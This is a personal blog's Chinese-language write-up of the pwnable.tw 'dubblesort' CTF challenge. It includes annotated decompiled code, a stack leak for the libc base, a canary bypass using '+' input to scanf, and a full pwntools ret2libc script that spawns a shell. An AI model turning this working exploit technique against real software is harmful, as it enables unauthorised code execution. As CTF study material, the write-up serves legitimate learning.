<html>

<head>
    <meta charset="utf-8">
    
    <title>pwnable tw dubblesort writeup | WELCOME to nobody&#39;s homepage</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="/favicon/favicon.ico">
    
<link rel="stylesheet" href="/nana7777777mi.github.io/css/main.css">

    
<link rel="stylesheet" href="/nana7777777mi.github.io/css/tagplugins.css">

    
<link rel="stylesheet" href="/nana7777777mi.github.io/css/highlight.css">

    


    <!-- rss -->
    
    
      <link rel="alternate" href="/nana7777777mi.github.io/atom.xml" title="WELCOME to nobody&#39;s homepage" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div class="blog-header">
   <a id="menu-nav-icon"><img src="/nana7777777mi.github.io/image/menu.png"/></a>
   <div class="nav-container">
     <nav id="main-nav">
       
         <a class="main-nav-link" href="/nana7777777mi.github.io/">Home</a>
       
         <a class="main-nav-link" href="/nana7777777mi.github.io/archives">Archives</a>
       
     </nav>
   </div>
   <!--
   <div id="search-form-wrap">
     <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://github.com/nana7777777mi"></form>
   </div>
 -->
    <h1 class="blog-title">WELCOME to nobody&#39;s homepage</h1>
    <p class="lead blog-description">pwn for fun not for profit</p>
</div>

  <div id='main-part'>
      <div class="main">
<div class="blog-post">
    <!-- Title -->
    <h1 class="blog-post-title">
        <a href="/nana7777777mi.github.io/2021/11/13/pwnable-tw-dubblesort-writeup/">
            Pwnable Tw Dubblesort Writeup
        </a>
    </h1>
    <!-- Date and Author -->
    <p class="blog-post-meta">
        2021-11-13
        
    </p>

    

    <!-- Content -->
    <span id="more"></span>

<p>##题目考点</p>
<ul>
<li>ret2libc</li>
<li>绕过canary</li>
</ul>
<hr>
<p>##解题思路</p>
<p> check一下，保护全开，不过是32位程序(可以把参数/bin/sh直接放在栈上传入system()函数执行，若是64位程序难度更大)</p>
<p> 进入ida进行分析，主要逻辑在main函数中，比较简单:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> *v4; <span class="comment">// edi</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v5; <span class="comment">// esi</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v6; <span class="comment">// esi</span></span><br><span class="line">  <span class="keyword">int</span> v7; <span class="comment">// ST08_4</span></span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v9; <span class="comment">// [esp+18h] [ebp-74h]</span></span><br><span class="line">  <span class="keyword">int</span> v10; <span class="comment">// [esp+1Ch] [ebp-70h]</span></span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [esp+3Ch] [ebp-50h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v12; <span class="comment">// [esp+7Ch] [ebp-10h]		//canary位置特殊，其下距离retaddr还有(0x10 - 0x04 + 0x0c + 0x08)bytes的空间，即8个int的位置</span></span><br><span class="line"></span><br><span class="line">  v12 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  sub_8B5();</span><br><span class="line">  __printf_chk(<span class="number">1</span>, <span class="string">&quot;What your name :&quot;</span>);		<span class="comment">//单纯从做题角度来看，这种意义不明的输入必是突破口了</span></span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0x40</span>u);						<span class="comment">//仔细观察调试后发现，栈上有残留数据</span></span><br><span class="line">  __printf_chk(<span class="number">1</span>, <span class="string">&quot;Hello %s,How many numbers do you what to sort :&quot;</span>);</span><br><span class="line">  <span class="comment">//利用printf&#x27;\0&#x27;截断的特性来输出栈上残留数据，此处为.got.plt的地址，进而泄露libc基址</span></span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%u&quot;</span>, &amp;v9);</span><br><span class="line">  v3 = v9;</span><br><span class="line">  <span class="keyword">if</span> ( v9 )</span><br><span class="line">  &#123;</span><br><span class="line">    v4 = &amp;v10;</span><br><span class="line">    v5 = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">do</span></span><br><span class="line">    &#123;</span><br><span class="line">      __printf_chk(<span class="number">1</span>, <span class="string">&quot;Enter the %d number : &quot;</span>);</span><br><span class="line"><span class="comment">//通过此处改变栈上数据，篡改retaddr为system函数地址，retaddr之后的位置存放&quot;/bin/sh&quot;字符串地址</span></span><br><span class="line">      fflush(<span class="built_in">stdout</span>);</span><br><span class="line">      __isoc99_scanf(<span class="string">&quot;%u&quot;</span>, v4);</span><br><span class="line">      ++v5;</span><br><span class="line">      v3 = v9;</span><br><span class="line">      ++v4;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> ( v9 &gt; v5 );</span><br><span class="line">  &#125;</span><br><span class="line">  sub_931((<span class="keyword">unsigned</span> <span class="keyword">int</span> *)&amp;v10, v3);</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">由于该排序函数以及canary的存在，需要保证:&#123;</span></span><br><span class="line"><span class="comment">   - canary前的数据都比canary小</span></span><br><span class="line"><span class="comment">   - canary后的值都比其大</span></span><br><span class="line"><span class="comment">&#125;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Result :&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> ( v9 )</span><br><span class="line">  &#123;</span><br><span class="line">    v6 = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">do</span></span><br><span class="line">    &#123;</span><br><span class="line">      v7 = *(&amp;v10 + v6);</span><br><span class="line">      __printf_chk(<span class="number">1</span>, <span class="string">&quot;%u &quot;</span>);</span><br><span class="line">      ++v6;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> ( v9 &gt; v6 );</span><br><span class="line">  &#125;</span><br><span class="line">  result = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( __readgsdword(<span class="number">0x14</span>u) != v12 )</span><br><span class="line">    sub_BA0();</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p> 在开始编写exp之前，由于题目提供了libc，还需要调整本地环境:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ldd ./dubblesort</span><br><span class="line">patchelf --set-interpreter /root/asswecan/glibc-all-in-one/libs/2.23-0ubuntu3_i386/ld-linux.so.2 dubblesort</span><br><span class="line">patchelf --replace-needed libc.so.6 ./libc_32.so.6 dubblesort</span><br></pre></td></tr></table></figure>

<hr>
<p>##exploit</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p 	 = process(<span class="string">&#x27;./dubblesort&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc_32.so.6&#x27;</span>)</span><br><span class="line"><span class="comment">#&quot;readelf -S ./libc_32.so.6&quot;得到的偏移量</span></span><br><span class="line">offs = <span class="number">0x001b0000</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;What your name :&#x27;</span>)</span><br><span class="line"><span class="comment">#0x18+1来连接到地址(地址末位为00)</span></span><br><span class="line">p.send(<span class="string">b&#x27;a&#x27;</span> * (<span class="number">0x18</span> + <span class="number">1</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;a&#x27;</span> * <span class="number">0x18</span>)</span><br><span class="line"><span class="comment">#注意此处的运算符优先级/哭哭调了好久才意识到这个小错误</span></span><br><span class="line">libc_base = (u32(p.recv(<span class="number">4</span>)) &amp; <span class="number">0xffffff00</span>) - offs</span><br><span class="line">syst_addr = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bins_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line">stack_off = (<span class="number">0x60</span> // <span class="number">4</span>) + <span class="number">1</span> + <span class="number">9</span> + <span class="number">1</span></span><br><span class="line">p.sendline(<span class="built_in">str</span>(stack_off).encode())</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x60</span> // <span class="number">4</span>):</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;number :&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"><span class="comment">#&#x27;+&#x27;可以让scanf%u视作合法输入却不改变栈上的值</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;number :&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;+&#x27;</span>)</span><br><span class="line"><span class="comment">#为了sysaddr不被排序函数改变，直接在栈上填9个sysaddr至retaddr处</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x09</span>):</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;number :&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(syst_addr).encode())</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;number :&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(bins_addr).encode())</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Result :&#x27;</span>)</span><br><span class="line">p.recv()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    <!-- Social share choices -->
    
  <div id="social-share">
    <a data-url="https://github.com/nana7777777mi/2021/11/13/pwnable-tw-dubblesort-writeup/" target="_blank" rel="noopener" href="https://plus.google.com/share?url=" class="googleplus"><img src="/nana7777777mi.github.io/image/googleplusicon.png" alt=""/></a>
    <a data-url="https://github.com/nana7777777mi/2021/11/13/pwnable-tw-dubblesort-writeup/" target="_blank" rel="noopener" href="https://twitter.com/intent/tweet?url=" class="twitter"><img src="/nana7777777mi.github.io/image/twittericon.png" alt=""/></a>
    <a data-url="https://github.com/nana7777777mi/2021/11/13/pwnable-tw-dubblesort-writeup/" target="_blank" rel="noopener" href="http://pinterest.com/pin/create/button/?url=" class="pinterest"><img src="/nana7777777mi.github.io/image/pinteresticon.png" alt=""/></a>
    <a data-url="https://github.com/nana7777777mi/2021/11/13/pwnable-tw-dubblesort-writeup/" target="_blank" rel="noopener" href="https://www.facebook.com/sharer/sharer.php?u=" class="facebook"><img src="/nana7777777mi.github.io/image/facebookicon.png" alt=""/></a>
  </div>





<!--


https://www.facebook.com/sharer/sharer.php?u=https://github.com/nana7777777mi/2021/11/13/pwnable-tw-dubblesort-writeup/
https://github.com/nana7777777mi/2021/11/13/pwnable-tw-dubblesort-writeup/
-->



    <hr />


    <!-- Tags and Categories links -->
    

    


<div class="blog-tags-container">
    <span><img src="/nana7777777mi.github.io/image/tagsicon.png" alt=""/></span>
    <a href="/nana7777777mi.github.io/tags/pwnable-bof-ret2libc/">#pwnable | bof | ret2libc</a>
</div>



    <!-- Comment using disqus -->
    

</div>
</div>


  </div>
  <!-- Footer -->
  <div id="footer">
  <div id="footer-social">
    
    
    
    
    
    
</div>

  <p id="footer-info">
    &copy; 2021 inva1id<br>
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> -
    主题 <a href="https://github.com/Suolawangzai/hexo-theme-nebula" target="_blank">nebula</a>
  </p>

  <div id="busuanzi">
    <span id="busuanzi_container_site_pv">
      &hearts;
    总访问量: <span id="busuanzi_value_site_pv"></span>
    </span>
  </div>
  <!--
  <div id="footer-info">
    &copy; 2021 inva1id<br>
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
  </div>
-->
</div>

  <!-- After footer scripts -->
  <!-- Disqus Comments -->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<script src="/nana7777777mi.github.io/js/main.js"></script>


<script src="/nana7777777mi.github.io/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>
